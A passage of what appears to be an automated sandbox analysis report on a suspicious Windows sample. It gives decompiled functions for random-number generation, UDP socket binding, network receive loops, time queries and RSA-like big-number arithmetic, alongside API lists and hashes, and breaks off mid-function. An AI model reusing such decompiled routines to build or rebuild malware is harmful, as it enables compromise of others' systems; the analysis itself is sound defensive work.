                                                                                                                                                                                                                                                                  • Opcode ID: 1fc1e9e51b8d3a755360d72960d4b34ea433d7ab73e8c8e3fbb0d1fce81ebb19
                                                                                                                                                                                                                                                                  • Instruction ID: 53aac2a77a9f56d9b5b49871b8f1364076886e856ea69bd72e3e10827216548d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fc1e9e51b8d3a755360d72960d4b34ea433d7ab73e8c8e3fbb0d1fce81ebb19
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F861DA31600606DFEB29CF2BC98466673A1EF95354B248D7BD806E72D1E339DC92C69C
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                                                                                                                  			E0040A590(void* __ecx, BYTE* _a4, int _a8) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				char* _t6;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t1 =  &_v8; // 0x406269
                                                                                                                                                                                                                                                                  				_t6 = _t1;
                                                                                                                                                                                                                                                                  				__imp__CryptAcquireContextW(_t6, 0, 0, 1, 0xf0000040, __ecx);
                                                                                                                                                                                                                                                                  				if(_t6 != 0) {
                                                                                                                                                                                                                                                                  					_t4 =  &_v8; // 0x406269
                                                                                                                                                                                                                                                                  					CryptGenRandom( *_t4, _a8, _a4);
                                                                                                                                                                                                                                                                  					_t5 =  &_v8; // 0x406269
                                                                                                                                                                                                                                                                  					return CryptReleaseContext( *_t5, 0);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t6;
                                                                                                                                                                                                                                                                  			}





                                                                                                                                                                                                                                                                  0x0040a59f
                                                                                                                                                                                                                                                                  0x0040a59f
                                                                                                                                                                                                                                                                  0x0040a5a3
                                                                                                                                                                                                                                                                  0x0040a5ab
                                                                                                                                                                                                                                                                  0x0040a5b5
                                                                                                                                                                                                                                                                  0x0040a5b9
                                                                                                                                                                                                                                                                  0x0040a5c1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040a5c5
                                                                                                                                                                                                                                                                  0x0040a5ce

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(ib@,00000000,00000000,00000001,F0000040,?,?,0040A5E9,ib@,00000004,?,?,0040A61E,000000FF), ref: 0040A5A3
                                                                                                                                                                                                                                                                  • CryptGenRandom.ADVAPI32(ib@,?,00000000,?,?,0040A5E9,ib@,00000004,?,?,0040A61E,000000FF), ref: 0040A5B9
                                                                                                                                                                                                                                                                  • CryptReleaseContext.ADVAPI32(ib@,00000000,?,?,0040A5E9,ib@,00000004,?,?,0040A61E,000000FF), ref: 0040A5C5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                                  • String ID: ib@
                                                                                                                                                                                                                                                                  • API String ID: 1815803762-2572181768
                                                                                                                                                                                                                                                                  • Opcode ID: 19638542191e3fb3c25dfebe44d0539c5debb8449ecbe4532cb7510c5fe412a5
                                                                                                                                                                                                                                                                  • Instruction ID: e86f9f2f6962971676cdee64fe7ddd258c269ae68294ba7c70f801d1bcef9814
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19638542191e3fb3c25dfebe44d0539c5debb8449ecbe4532cb7510c5fe412a5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EE01275650208BBDB24CBD1DD49F9A776CAB48700F104174BB09E7280DA75EA048768
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040E488
                                                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32(?,?,0040E9A4), ref: 0040E490
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000001,?,?,0040E9A4), ref: 0040E4A6
                                                                                                                                                                                                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040E4CC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3668019968-0
                                                                                                                                                                                                                                                                  • Opcode ID: 808051cf4c25f8d78f6be8b19897f5cc4abf4f17fe048894847bde9b845f694e
                                                                                                                                                                                                                                                                  • Instruction ID: f60af05fe9e946153d7423b5ea7d9ed04cc507d8caf150a665a7eef65fd161d3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 808051cf4c25f8d78f6be8b19897f5cc4abf4f17fe048894847bde9b845f694e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1511AD76108305AFD320DF65EC84AABB7ECEB88700F40493EF945E2140E676E90D97B6
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 22%
                                                                                                                                                                                                                                                                  			E0040DA90(void* __edi) {
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				short _v26;
                                                                                                                                                                                                                                                                  				char _v28;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				void* _t15;
                                                                                                                                                                                                                                                                  				void* _t24;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t27 = __edi;
                                                                                                                                                                                                                                                                  				_t24 = E00408820(0x24);
                                                                                                                                                                                                                                                                  				 *_t24 = 0x756470;
                                                                                                                                                                                                                                                                  				 *(_t24 + 4) = 1;
                                                                                                                                                                                                                                                                  				_t15 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                  				 *(_t24 + 0x10) = _t15;
                                                                                                                                                                                                                                                                  				__imp__#23(2, 2, 0x11);
                                                                                                                                                                                                                                                                  				 *(_t24 + 8) = _t15;
                                                                                                                                                                                                                                                                  				if(_t15 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					E0040DA20(_t24, __edi);
                                                                                                                                                                                                                                                                  					_t24 = 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(_t24 == 0) {
                                                                                                                                                                                                                                                                  					L6:
                                                                                                                                                                                                                                                                  					return _t24;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v26 = 0;
                                                                                                                                                                                                                                                                  					_v22 = 0;
                                                                                                                                                                                                                                                                  					_v18 = 0;
                                                                                                                                                                                                                                                                  					_v14 = 0;
                                                                                                                                                                                                                                                                  					_v28 = 2;
                                                                                                                                                                                                                                                                  					__imp__#2( *(_t24 + 8),  &_v28, 0x10);
                                                                                                                                                                                                                                                                  					if(2 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t24 + 0xc)) = _v20;
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t24 + 0x14)) = CreateThread(0, 0, E0040D7F0, _t24, 0, 0);
                                                                                                                                                                                                                                                                  						goto L6;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						E0040DA20(_t24, _t27);
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x0040da90
                                                                                                                                                                                                                                                                  0x0040daa2
                                                                                                                                                                                                                                                                  0x0040daa8
                                                                                                                                                                                                                                                                  0x0040daae
                                                                                                                                                                                                                                                                  0x0040dab5
                                                                                                                                                                                                                                                                  0x0040dac1
                                                                                                                                                                                                                                                                  0x0040dac4
                                                                                                                                                                                                                                                                  0x0040daca
                                                                                                                                                                                                                                                                  0x0040dad0
                                                                                                                                                                                                                                                                  0x0040dad2
                                                                                                                                                                                                                                                                  0x0040dad7
                                                                                                                                                                                                                                                                  0x0040dad7
                                                                                                                                                                                                                                                                  0x0040dadb
                                                                                                                                                                                                                                                                  0x0040db3a
                                                                                                                                                                                                                                                                  0x0040db40
                                                                                                                                                                                                                                                                  0x0040dadd
                                                                                                                                                                                                                                                                  0x0040dadf
                                                                                                                                                                                                                                                                  0x0040dae3
                                                                                                                                                                                                                                                                  0x0040dae7
                                                                                                                                                                                                                                                                  0x0040daeb
                                                                                                                                                                                                                                                                  0x0040dafb
                                                                                                                                                                                                                                                                  0x0040db05
                                                                                                                                                                                                                                                                  0x0040db0e
                                                                                                                                                                                                                                                                  0x0040db2e
                                                                                                                                                                                                                                                                  0x0040db37
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040db10
                                                                                                                                                                                                                                                                  0x0040db10
                                                                                                                                                                                                                                                                  0x0040db1b
                                                                                                                                                                                                                                                                  0x0040db1b
                                                                                                                                                                                                                                                                  0x0040db0e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040BC3E,00000000), ref: 0040DAB5
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040DAC4
                                                                                                                                                                                                                                                                  • bind.WS2_32(?,?,00000010), ref: 0040DB05
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: SetEvent.KERNEL32(?,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA31
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: WaitForSingleObject.KERNEL32(?,000000FF,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA3D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DA20: CloseHandle.KERNEL32(?,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA47
                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 0040DB31
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3943618503-0
                                                                                                                                                                                                                                                                  • Opcode ID: c94050519661c8a51bd85b0177b6e18eb17cf6b8fff5dae366dd3462cd044c6d
                                                                                                                                                                                                                                                                  • Instruction ID: 5276f6ad8d77c11c83a369dc1e5a02b163374df96baf18b758578e552dca49b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c94050519661c8a51bd85b0177b6e18eb17cf6b8fff5dae366dd3462cd044c6d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54119874B44300AFE7109FB48C86B5776A0EF04714F508579FA58EA2D2D2B5D4088B5A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                                                                                                                  			E0040BB80() {
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				char _v16;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				NtQuerySystemTime( &_v12);
                                                                                                                                                                                                                                                                  				__imp__RtlTimeToSecondsSince1980( &_v12,  &_v16);
                                                                                                                                                                                                                                                                  				return _v16;
                                                                                                                                                                                                                                                                  			}





                                                                                                                                                                                                                                                                  0x0040bb8a
                                                                                                                                                                                                                                                                  0x0040bb98
                                                                                                                                                                                                                                                                  0x0040bba4

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtQuerySystemTime.NTDLL ref: 0040BB8A
                                                                                                                                                                                                                                                                  • RtlTimeToSecondsSince1980.NTDLL ref: 0040BB98
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Time$QuerySecondsSince1980System
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1987401769-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7639c7917e785db677c0a9ec39789b2c0ddec4d8e13f0e230e0a56a184e8549a
                                                                                                                                                                                                                                                                  • Instruction ID: 5e89c71351110d23968ee945d9d929a3af5f8ee8cb6416838f5e3434c1b6b747
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7639c7917e785db677c0a9ec39789b2c0ddec4d8e13f0e230e0a56a184e8549a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59D09E7DD1020DABCB10EBE4E9498DDB77CEA44201F0045FAED15A2540E67166188BD5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                                                                                                  			E00402E90(void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20) {
                                                                                                                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                                                                                                                  				signed int _v24;
                                                                                                                                                                                                                                                                  				signed int _v28;
                                                                                                                                                                                                                                                                  				signed int _v32;
                                                                                                                                                                                                                                                                  				signed int _v36;
                                                                                                                                                                                                                                                                  				signed int _v40;
                                                                                                                                                                                                                                                                  				signed int _v44;
                                                                                                                                                                                                                                                                  				signed int _v48;
                                                                                                                                                                                                                                                                  				signed int _v52;
                                                                                                                                                                                                                                                                  				signed int _v56;
                                                                                                                                                                                                                                                                  				signed int _v60;
                                                                                                                                                                                                                                                                  				signed int _v64;
                                                                                                                                                                                                                                                                  				intOrPtr _v580;
                                                                                                                                                                                                                                                                  				unsigned int _v584;
                                                                                                                                                                                                                                                                  				signed int _v588;
                                                                                                                                                                                                                                                                  				intOrPtr _v592;
                                                                                                                                                                                                                                                                  				intOrPtr _t249;
                                                                                                                                                                                                                                                                  				signed int _t260;
                                                                                                                                                                                                                                                                  				signed int _t282;
                                                                                                                                                                                                                                                                  				signed int _t302;
                                                                                                                                                                                                                                                                  				signed int _t311;
                                                                                                                                                                                                                                                                  				signed int _t317;
                                                                                                                                                                                                                                                                  				signed int _t329;
                                                                                                                                                                                                                                                                  				signed int _t334;
                                                                                                                                                                                                                                                                  				signed int _t370;
                                                                                                                                                                                                                                                                  				unsigned int _t377;
                                                                                                                                                                                                                                                                  				signed int _t389;
                                                                                                                                                                                                                                                                  				signed int _t416;
                                                                                                                                                                                                                                                                  				signed int _t425;
                                                                                                                                                                                                                                                                  				signed int _t433;
                                                                                                                                                                                                                                                                  				unsigned int _t441;
                                                                                                                                                                                                                                                                  				signed int _t443;
                                                                                                                                                                                                                                                                  				signed int _t445;
                                                                                                                                                                                                                                                                  				signed int _t446;
                                                                                                                                                                                                                                                                  				signed int _t448;
                                                                                                                                                                                                                                                                  				signed int _t449;
                                                                                                                                                                                                                                                                  				void* _t463;
                                                                                                                                                                                                                                                                  				void* _t464;
                                                                                                                                                                                                                                                                  				void* _t465;
                                                                                                                                                                                                                                                                  				void* _t470;
                                                                                                                                                                                                                                                                  				void* _t471;
                                                                                                                                                                                                                                                                  				void* _t472;
                                                                                                                                                                                                                                                                  				void* _t477;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t341 = _a12;
                                                                                                                                                                                                                                                                  				_t249 = E00402290(_a12, _a20);
                                                                                                                                                                                                                                                                  				_t465 = _t464 + 8;
                                                                                                                                                                                                                                                                  				_v592 = _t249;
                                                                                                                                                                                                                                                                  				if(_v592 != 0) {
                                                                                                                                                                                                                                                                  					__eflags = _v592 - 1;
                                                                                                                                                                                                                                                                  					if(_v592 != 1) {
                                                                                                                                                                                                                                                                  						_v28 = 0;
                                                                                                                                                                                                                                                                  						while(1) {
                                                                                                                                                                                                                                                                  							__eflags = _v28 - 8;
                                                                                                                                                                                                                                                                  							if(_v28 >= 8) {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _v28 - 0x20;
                                                                                                                                                                                                                                                                  							if(_v28 >= 0x20) {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t341 = _v28;
                                                                                                                                                                                                                                                                  							__eflags =  *((intOrPtr*)(0x412f04 + _t341 * 4)) - _v592;
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)(0x412f04 + _t341 * 4)) <= _v592) {
                                                                                                                                                                                                                                                                  								_t334 = _v28 + 1;
                                                                                                                                                                                                                                                                  								__eflags = _t334;
                                                                                                                                                                                                                                                                  								_v28 = _t334;
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						__eflags = _v28 - 1;
                                                                                                                                                                                                                                                                  						if(__eflags > 0) {
                                                                                                                                                                                                                                                                  							_v44 = _a20 << 1;
                                                                                                                                                                                                                                                                  							_v48 = E00401400(_t341, _v44);
                                                                                                                                                                                                                                                                  							_v52 = E00401400(_v44, _v44);
                                                                                                                                                                                                                                                                  							_v20 = E00401400(_v44, _v44);
                                                                                                                                                                                                                                                                  							_v16 = E00401400(_v44, _v44);
                                                                                                                                                                                                                                                                  							_v580 = _a8;
                                                                                                                                                                                                                                                                  							E00402950(_v580, __eflags, _v20, _v580, _v580, _a16, _a20);
                                                                                                                                                                                                                                                                  							_t470 = _t465 + 0x24;
                                                                                                                                                                                                                                                                  							_v64 = 1 << _v28 - 1;
                                                                                                                                                                                                                                                                  							_v24 = 1;
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								_t347 = _v24;
                                                                                                                                                                                                                                                                  								__eflags = _v24 - _v64;
                                                                                                                                                                                                                                                                  								if(_v24 >= _v64) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)) = E00401400(_t347, _v44);
                                                                                                                                                                                                                                                                  								E00402310( *((intOrPtr*)(_t463 + _v24 * 4 - 0x244)),  *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)),  *((intOrPtr*)(_t463 + _v24 * 4 - 0x244)), _a20);
                                                                                                                                                                                                                                                                  								_t477 = _t470 + 0x10;
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									E00401960(_v48, _v20,  *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)), _a20);
                                                                                                                                                                                                                                                                  									E00401BD0(__eflags, _v52,  *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)), _v48, _a20 << 1, _a16, _a20);
                                                                                                                                                                                                                                                                  									_t477 = _t477 + 0x28;
                                                                                                                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                                                                                                                  								} while (0 != 0);
                                                                                                                                                                                                                                                                  								_t329 = _v24 + 1;
                                                                                                                                                                                                                                                                  								__eflags = _t329;
                                                                                                                                                                                                                                                                  								_v24 = _t329;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_v56 = 1;
                                                                                                                                                                                                                                                                  							_t260 = E00402250(_a12, _a20);
                                                                                                                                                                                                                                                                  							_t471 = _t470 + 8;
                                                                                                                                                                                                                                                                  							_v588 = _t260;
                                                                                                                                                                                                                                                                  							_v40 = 0x80000000;
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								__eflags = _v40;
                                                                                                                                                                                                                                                                  								if(_v40 <= 0) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t449 = _v588;
                                                                                                                                                                                                                                                                  								_t317 = _a12;
                                                                                                                                                                                                                                                                  								__eflags =  *(_t317 + _t449 * 4 - 4) & _v40;
                                                                                                                                                                                                                                                                  								if(( *(_t317 + _t449 * 4 - 4) & _v40) == 0) {
                                                                                                                                                                                                                                                                  									_t389 = _v40 >> 1;
                                                                                                                                                                                                                                                                  									__eflags = _t389;
                                                                                                                                                                                                                                                                  									_v40 = _t389;
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_v12 = 0;
                                                                                                                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                                                                                                                  							_v36 = 0;
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								__eflags = _v588;
                                                                                                                                                                                                                                                                  								if(_v588 == 0) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__eflags = _v56;
                                                                                                                                                                                                                                                                  								if(_v56 != 0) {
                                                                                                                                                                                                                                                                  									L29:
                                                                                                                                                                                                                                                                  									__eflags = _v8;
                                                                                                                                                                                                                                                                  									if(_v8 != 0) {
                                                                                                                                                                                                                                                                  										__eflags = _v12;
                                                                                                                                                                                                                                                                  										if(_v12 > 0) {
                                                                                                                                                                                                                                                                  											_t433 = _v12 - 1;
                                                                                                                                                                                                                                                                  											__eflags = _t433;
                                                                                                                                                                                                                                                                  											_v12 = _t433;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										L52:
                                                                                                                                                                                                                                                                  										__eflags = _v8;
                                                                                                                                                                                                                                                                  										if(_v8 == 0) {
                                                                                                                                                                                                                                                                  											do {
                                                                                                                                                                                                                                                                  												L58:
                                                                                                                                                                                                                                                                  												__eflags = _v40 - 1;
                                                                                                                                                                                                                                                                  												if(_v40 != 1) {
                                                                                                                                                                                                                                                                  													_t425 = _v40 >> 1;
                                                                                                                                                                                                                                                                  													__eflags = _t425;
                                                                                                                                                                                                                                                                  													_v40 = _t425;
                                                                                                                                                                                                                                                                  												} else {
                                                                                                                                                                                                                                                                  													_v40 = 0x80000000;
                                                                                                                                                                                                                                                                  													_v588 = _v588 - 1;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  												__eflags = 0;
                                                                                                                                                                                                                                                                  											} while (0 != 0);
                                                                                                                                                                                                                                                                  											continue;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										__eflags = _v12 - 1;
                                                                                                                                                                                                                                                                  										if(_v12 >= 1) {
                                                                                                                                                                                                                                                                  											goto L58;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										__eflags = _v56;
                                                                                                                                                                                                                                                                  										if(_v56 == 0) {
                                                                                                                                                                                                                                                                  											do {
                                                                                                                                                                                                                                                                  												E00401960(_v48,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _v16, _a20);
                                                                                                                                                                                                                                                                  												E00401BD0(__eflags, _v52, _v16, _v48, _a20 << 1, _a16, _a20);
                                                                                                                                                                                                                                                                  												_t471 = _t471 + 0x28;
                                                                                                                                                                                                                                                                  												__eflags = 0;
                                                                                                                                                                                                                                                                  											} while (0 != 0);
                                                                                                                                                                                                                                                                  											L57:
                                                                                                                                                                                                                                                                  											_v8 = 0;
                                                                                                                                                                                                                                                                  											_v12 = 0;
                                                                                                                                                                                                                                                                  											goto L58;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										E00402310(_v36, _v16,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _a20);
                                                                                                                                                                                                                                                                  										_t471 = _t471 + 0xc;
                                                                                                                                                                                                                                                                  										_v56 = 0;
                                                                                                                                                                                                                                                                  										goto L57;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t302 = _v588;
                                                                                                                                                                                                                                                                  									_t370 = _a12;
                                                                                                                                                                                                                                                                  									__eflags =  *(_t370 + _t302 * 4 - 4) & _v40;
                                                                                                                                                                                                                                                                  									if(( *(_t370 + _t302 * 4 - 4) & _v40) == 0) {
                                                                                                                                                                                                                                                                  										L49:
                                                                                                                                                                                                                                                                  										goto L52;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_v8 = 1;
                                                                                                                                                                                                                                                                  									_v60 = _v40;
                                                                                                                                                                                                                                                                  									_v32 = _v588;
                                                                                                                                                                                                                                                                  									_v584 = 1;
                                                                                                                                                                                                                                                                  									_v24 = 0;
                                                                                                                                                                                                                                                                  									while(1) {
                                                                                                                                                                                                                                                                  										__eflags = _v24 - _v28 - 1;
                                                                                                                                                                                                                                                                  										if(_v24 >= _v28 - 1) {
                                                                                                                                                                                                                                                                  											break;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											goto L34;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										do {
                                                                                                                                                                                                                                                                  											L34:
                                                                                                                                                                                                                                                                  											__eflags = _v60 - 1;
                                                                                                                                                                                                                                                                  											if(_v60 != 1) {
                                                                                                                                                                                                                                                                  												_t443 = _v60 >> 1;
                                                                                                                                                                                                                                                                  												__eflags = _t443;
                                                                                                                                                                                                                                                                  												_v60 = _t443;
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												_v60 = 0x80000000;
                                                                                                                                                                                                                                                                  												_v32 = _v32 - 1;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											__eflags = 0;
                                                                                                                                                                                                                                                                  										} while (0 != 0);
                                                                                                                                                                                                                                                                  										_v584 = _v584 << 1;
                                                                                                                                                                                                                                                                  										__eflags = _v32;
                                                                                                                                                                                                                                                                  										if(_v32 != 0) {
                                                                                                                                                                                                                                                                  											_t446 = _v32;
                                                                                                                                                                                                                                                                  											_t311 = _a12;
                                                                                                                                                                                                                                                                  											__eflags =  *(_t311 + _t446 * 4 - 4) & _v60;
                                                                                                                                                                                                                                                                  											if(( *(_t311 + _t446 * 4 - 4) & _v60) != 0) {
                                                                                                                                                                                                                                                                  												_t448 = _v584 | 0x00000001;
